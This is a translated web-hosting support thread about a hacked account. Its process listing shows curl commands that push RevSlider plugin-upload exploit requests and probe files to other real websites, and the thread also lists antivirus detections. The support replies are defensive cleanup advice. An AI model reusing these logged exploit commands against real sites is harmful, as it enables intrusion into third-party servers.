Solutions for your inquiries


Question: CPU Usage is 92 / 100 %
Answer:

What did you run?


tural147 140559 0.0 0.0 129672 13340 ? S 14:39 0:00 cpaneld - serving 81.21. --llu=1422450509 --listen=3,4,5,6,7,8,9,10
tural147 141616 0.0 0.0 3164 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) --request GET http://rtlpalvelut.fi//index.php -o tmp/faxfqzulpvntykdyezebcvuln
tural147 141811 0.0 0.0 3164 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) --request GET http://www.stcatharinesstandard.ca//index.php -o tmp/ooxaklcyooaoykgpdbsycvuln
tural147 142268 0.0 0.0 3124 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) -H Cookie :\"\" -H Content_Type :form-data -F action=revslider_ajax_action -F client_action=update_plugin -F [email protected] --request POST http://www.lsbankchina.com//wp-admin/admin-ajax.php -o tmp/ismxkdbgxspxodgctihwwprev
tural147 142714 0.0 0.0 3204 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) -H Cookie :\"\" -H Content_Type :form-data -F action=revslider_ajax_action -F client_action=update_plugin -F [email protected] --request POST http://www.xn--aktieportefljen-gub.dk//wp-admin/admin-ajax.php -o tmp/yyvpstzvdeaxgrgkacgpwprev
tural147 142815 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142817 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142851 0.0 0.0 3184 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) http://karate.gibopaint.com/nyet.gif -o tmp/qiwbqnqxahmnkmthhdbcgck.txt
tural147 142858 0.0 0.0 4076 540 ? S 14:39 0:00 sleep 1
tural147 142871 0.0 0.0 3184 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) http://www.yamashinakensetsu.co.jp/nyet.gif -o tmp/smjofprupolupmcewmwjgck.txt
tural147 142875 0.0 0.0 3192 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -o tmp/saizycndsijjdyuxnlwvresp.txt -H User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:IP) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729) -H Accept-Language: en-us,en;q=0.5 -H Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -T nyet.gif http://www.semanariocentro.com.uy/
tural147 142897 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142900 0.0 0.0 4076 540 ? S 14:39 0:00 sleep 1
tural147 142901 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142918 0.0 0.0 0 0 ? R 14:39 0:00 [bash]
tural147 142922 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142924 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142925 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142935 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142937 0.0 0.0 17800 7040 ? R 14:39 0:00 bash apache2 fr,de,hr,cs,sl
tural147 142938 0.0 0.0 16788 5928 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
tural147 142939 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142945 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142946 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142948 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142950 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142955 0.0 0.0 17164 6340 ? R 14:39 0:00 bash apache2 en,et,fa,pl
tural147 142957 0.0 0.0 0 0 ? Z 14:39 0:00 [cut] <defunct>
tural147 142960 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142961 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142962 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142965 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142966 0.0 0.0 0 0 ? Z 14:39 0:00 [cut] <defunct>
tural147 142967 0.0 0.0 17164 5936 ? R 14:39 0:00 bash apache2 en,et,fa,pl
tural147 142968 0.0 0.0 20416 9292 ? R 14:39 0:00 bash apache2 ms,nb,pt_BR,pt_PT,ru
tural147 142969 0.0 0.0 16624 5400 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
tural147 142970 0.0 0.0 16624 5400 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
root 142972 0.0 0.0 103252 884 pts/0 S+ 14:39 0:00 grep tural147
tural147 776645 0.3 0.0 22000 11828 ? S Feb01 4:25 apache2 bash sr,sk,sv,th,ar
tural147 776669 0.3 0.0 22000 11840 ? S Feb01 4:24 apache2 bash tr,vi,uk,fi,
tural147 776732 0.3 0.0 22000 11828 ? S Feb01 4:24 bash apache2 da,nl,el,he,eg
tural147 776757 0.3 0.0 22000 11832 ? S Feb01 4:24 apache2 bash en,et,fa,pl
tural147 776794 0.3 0.0 22000 12092 ? S Feb01 4:23 apache2 bash fr,de,hr,cs,sl
tural147 776819 0.3 0.0 22000 12100 ? S Feb01 4:23 bash apache2 hu,is,id,it,es
tural147 776848 0.3 0.0 22000 11844 ? S Feb01 4:24 apache2 bash ja,ko,lv,lt,ro
tural147 776877 0.2 0.0 20416 10516 ? S Feb01 2:46 apache2 bash ms,nb,pt_BR,pt_PT,ru
tural147 777397 1.6 0.0 16624 6152 ? S Feb01 21:08 bash apache2 sr,sk,sv,th,ar
tural147 777398 1.7 0.0 16788 6340 ? S Feb01 22:28 bash apache2 sr,sk,sv,th,ar
tural147 777425 1.8 0.0 16916 6472 ? S Feb01 23:33 apache2 bash tr,vi,uk,fi,
tural147 777426 2.3 0.0 17312 6840 ? R Feb01 29:03 apache2 bash tr,vi,uk,fi,
tural147 777428 3.0 0.0 17948 7464 ? S Feb01 38:40 bash apache2 da,nl,el,he,eg
tural147 777429 3.2 0.0 18172 7664 ? S Feb01 41:12 bash apache2 da,nl,el,he,eg
tural147 777468 2.1 0.0 17352 6916 ? S Feb01 27:42 bash apache2 en,et,fa,pl
tural147 777469 1.9 0.0 17164 6684 ? R Feb01 24:16 bash apache2 en,et,fa,pl
tural147 777471 1.4 0.0 16492 6084 ? S Feb01 18:34 apache2 bash ja,ko,lv,lt,ro
tural147 777472 1.7 0.0 16744 6312 ? S Feb01 22:03 bash apache2 ja,ko,lv,lt,ro
tural147 777504 2.6 0.0 17800 7452 ? S Feb01 33:41 apache2 bash fr,de,hr,cs,sl
tural147 777505 2.4 0.0 17600 7284 ? R Feb01 31:07 apache2 bash fr,de,hr,cs,sl
tural147 777507 2.1 0.0 17284 6928 ? R Feb01 27:33 apache2 bash hu,is,id,it,es
tural147 777508 2.0 0.0 17100 6836 ? R Feb01 25:58 bash apache2 hu,is,id,it,es
tural147 777558 2.8 0.0 17880 7512 ? S Feb01 36:23 apache2 bash ms,nb,pt_BR,pt_PT,ru
tural147 989434 0.0 0.0 2432 23292 ? S 14:20 0:00 dovecot/imap

Question: Yes ("da")
Answer:

What does "da" mean? What did you start? Answer the question.

Answer:


/home/tural147/public_html/compinter.net/wp-admin/css/search.php: PHP.Agent-20 FOUND
/home/tural147/public_html/baubaspa.com/wp-admin/css/colors/ocean/ms-settings.php: PHP.Agent-20 FOUND
/home/tural147/wp-conf.php: Trojan.PHP-43 FOUND
/home/tural147/public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract/revslider.zip: PHP.Hide FOUND
/home/tural147/public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract/revslider.zip: PHP.Hide FOUND

Question: Thank you
Answer:

You're welcome. But you have a serious problem, and it is your fault: you used a vulnerable plugin and your site has been hacked.

http://1ps.ru/blog/sites/virus-soaksoak-atakuet-sajtyi-pod-upravleniem-cms-wordpress Now you need to take measures to clean the site.

Access to the site is open only to your IP.

Question: So now nobody except me will be able to get into the site?
Answer:

While you are clear on hotwirecom - no. You have a serious problem: your sites are hacked. Better that nobody goes to your website than that search engines will not even let you on the site because of viruses.

Answer:

Your site yildiz.az is one solid virus.

Question: bubaspa is a folder and it was empty at the start; please check again
Answer:

Your sites are infected. The reason for the hack is a vulnerable plugin. Take measures to clean the sites.

Question: Can you send me the infected folders?
Answer:

No, we are not sending the files. You have the FTP details; you can download the files yourself.

Question: Sorry, I meant the links to the folders, for example /home/tural147/public_html/compinter.net/wp-admin/css/search.php: PHP.Agent-20 FOUND
Answer:

All sites and files need to be checked. We gave you a link to a description of the problem:

http://1ps.ru/blog/sites/virus-soaksoak-atakuet-sajtyi-pod-upravleniem-cms-wordpress/

Either check each file, or you can create the sites again.

Question: .trash, baubaspa.com, compinter.net: the folders cannot be deleted
Answer:

.trash is a system folder; you can't touch it.

Question: public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract: the folder cannot be deleted
Answer:

Do you want us to recreate your account?

Question: I mean that you should send me the links to the infected folders
Question: I sent you the files that were not deleted
Answer:

How did you? What are the files? Have you checked all the files of all the sites?

Question: I sent you the files that cannot be deleted: public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract. I ask you to delete them = update_extract
Answer:

Delete public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract? But it will not solve the problem.

Question: Is it possible to restore the site to a date when the site was not hacked and worked normally?
Answer:

We do not know when it was hacked. You have infected files from 26 Jan, and we have no backups for this date. In addition, if you restore it, it will be hacked again.

We recommend you make a full backup, download it to your computer and then recreate all the sites again, without using improper plugins and themes from unofficial sources.

Question: Please, one last time, scan the site with your antivirus tools and send us the infected links
Answer:

Our anti-virus does not find these files; we have scanned repeatedly. Additionally, the anti-virus software automatically scans the entire server every few days.

Question: Can you explain to us how to make a full backup?
Answer:

Go into the control panel menu - backup - a full backup. Make a full backup and then download the file to your computer.


http://ded07.net/ help on how to use the panel

